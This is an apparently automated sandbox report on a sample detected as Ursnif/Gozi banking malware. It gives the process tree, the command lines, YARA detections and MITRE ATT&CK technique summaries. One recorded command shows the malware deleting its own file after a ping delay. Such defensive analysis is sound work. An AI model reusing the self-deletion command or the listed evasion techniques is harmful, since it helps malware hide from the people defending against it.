Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001A.00000003.945623628.000001E7C36E0000.00000004.00000001.sdmp, Author: Joe Security Rule: GoziRule, Description: Win32.Gozi, Source: 0000001A.00000003.945623628.000001E7C36E0000.00000004.00000001.sdmp, Author: CCN-CERT
Reputation:	high

Analysis Process: conhost.exe PID: 5112 Parent PID: 6988

General

Start time:	10:24:18
Start date:	22/01/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: csc.exe PID: 5336 Parent PID: 6988

General

Start time:	10:24:25
Start date:	22/01/2021
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\fcanujkk\fcanujkk.cmdline'
Imagebase:	0x7ff666a10000
File size:	2739304 bytes
MD5 hash:	B46100977911A0C9FB1C3E5F16A5017D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	moderate

Analysis Process: cvtres.exe PID: 5304 Parent PID: 5336

General

Start time:	10:24:26
Start date:	22/01/2021
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES352.tmp' 'c:\Users\user\AppData\Local\Temp\fcanujkk\CSC3173F20A33D44EE3A49D2AFD78C0E6C5.TMP'
Imagebase:	0x7ff62e800000
File size:	47280 bytes
MD5 hash:	33BB8BE0B4F547324D93D5D2725CAC3D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: csc.exe PID: 5696 Parent PID: 6988

General

Start time:	10:24:31
Start date:	22/01/2021
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\m5xmn43s\m5xmn43s.cmdline'
Imagebase:	0x7ff666a10000
File size:	2739304 bytes
MD5 hash:	B46100977911A0C9FB1C3E5F16A5017D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	moderate

Analysis Process: cvtres.exe PID: 7156 Parent PID: 5696

General

Start time:	10:24:32
Start date:	22/01/2021
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES1BBC.tmp' 'c:\Users\user\AppData\Local\Temp\m5xmn43s\CSCBE8D23AB53C749FF947299C54732EF79.TMP'
Imagebase:	0x7ff62e800000
File size:	47280 bytes
MD5 hash:	33BB8BE0B4F547324D93D5D2725CAC3D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: control.exe PID: 1576 Parent PID: 2628

General

Start time:	10:24:35
Start date:	22/01/2021
Path:	C:\Windows\System32\control.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\control.exe -h
Imagebase:	0x7ff7d01d0000
File size:	117760 bytes
MD5 hash:	625DAC87CB5D7D44C5CA1DA57898065F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: rundll32.exe PID: 3524 Parent PID: 1576

General

Start time:	10:24:39
Start date:	22/01/2021
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Imagebase:	0x7ff7af0f0000
File size:	69632 bytes
MD5 hash:	73C519F050C20580F8A62C849D49215A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: explorer.exe PID: 3424 Parent PID: 6988

General

Start time:	10:24:43
Start date:	22/01/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:
Imagebase:	0x7ff6fee60000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000024.00000002.1049878498.0000000004DDE000.00000004.00000001.sdmp, Author: Joe Security Rule: GoziRule, Description: Win32.Gozi, Source: 00000024.00000002.1049878498.0000000004DDE000.00000004.00000001.sdmp, Author: CCN-CERT

Analysis Process: cmd.exe PID: 6380 Parent PID: 3424

General

Start time:	10:24:59
Start date:	22/01/2021
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\cmd.exe' /C ping localhost -n 5 && del 'C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.81f401defa8faa2e.dll'
Imagebase:	0x7ff622070000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: conhost.exe PID: 4824 Parent PID: 6380

General

Start time:	10:25:00
Start date:	22/01/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: PING.EXE PID: 5984 Parent PID: 6380

General

Start time:	10:25:00
Start date:	22/01/2021
Path:	C:\Windows\System32\PING.EXE
Wow64 process (32bit):	false
Commandline:	ping localhost -n 5
Imagebase:	0x7ff779380000
File size:	21504 bytes
MD5 hash:	6A7389ECE70FB97BFE9A570DB4ACCC3B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Disassembly

Code Analysis

Reset < >

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	AWS CloudTrail logs, Authentication logs, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	DLL monitoring, File monitoring, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information.
Tactics:	Defense Evasion
Data Sources:	BIOS, MBR, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe is also a Microsoft signed binary.
Tactics:	Defense Evasion
Data Sources:	Loaded DLLs, Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Loaded DLLs, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report SecuriteInfo.com.Generic.mg.81f401defa8faa2e.14295

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: Ursnif

Yara Overview

Memory Dumps

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Exports

Version Infos

Possible Origin

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre